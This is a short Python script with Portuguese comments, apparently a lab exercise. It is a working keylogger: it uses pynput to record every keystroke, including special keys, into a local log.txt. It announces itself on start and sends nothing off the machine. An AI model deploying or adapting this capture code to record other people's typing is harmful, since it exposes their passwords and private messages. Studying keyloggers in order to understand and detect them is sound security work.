from pynput import keyboard

# Ajustado para Key (K maiúsculo) e corrigido caps_lock
IGNORAR = {
    keyboard.Key.shift,
    keyboard.Key.shift_r,
    keyboard.Key.ctrl_l,
    keyboard.Key.ctrl_r,
    keyboard.Key.alt_l,
    keyboard.Key.alt_r,
    keyboard.Key.caps_lock,
    keyboard.Key.cmd
}

def on_press(key):
    try:
        # Se for uma tecla "normal" (letra, numero, simbolo)             
        with open("log.txt", "a", encoding="utf-8") as f:
            if key.char is not None:
                f.write(key.char)
            
    except AttributeError:  
        with open("log.txt", "a", encoding="utf-8") as f:
            if key == keyboard.Key.space:
                f.write(" ")
            elif key == keyboard.Key.enter:
                f.write("\n")   
            elif key == keyboard.Key.tab:
                f.write("\t")
            elif key == keyboard.Key.backspace:
                # Geralmente no log usamos [BACKSPACE] para saber que algo foi apagado
                f.write(" [BACKSPACE] ")
            elif key == keyboard.Key.esc:
                f.write(" [ESC] ")
                # Se quiser que o programa pare ao apertar ESC, descomente a linha abaixo:
                # return False
            elif key in IGNORAR:
                pass
            else: 
                f.write(f" [{key}] ")
                
print("Laboratório rodando... Pressione teclas para gravar no log.txt")
with keyboard.Listener(on_press=on_press) as listener:
    listener.join()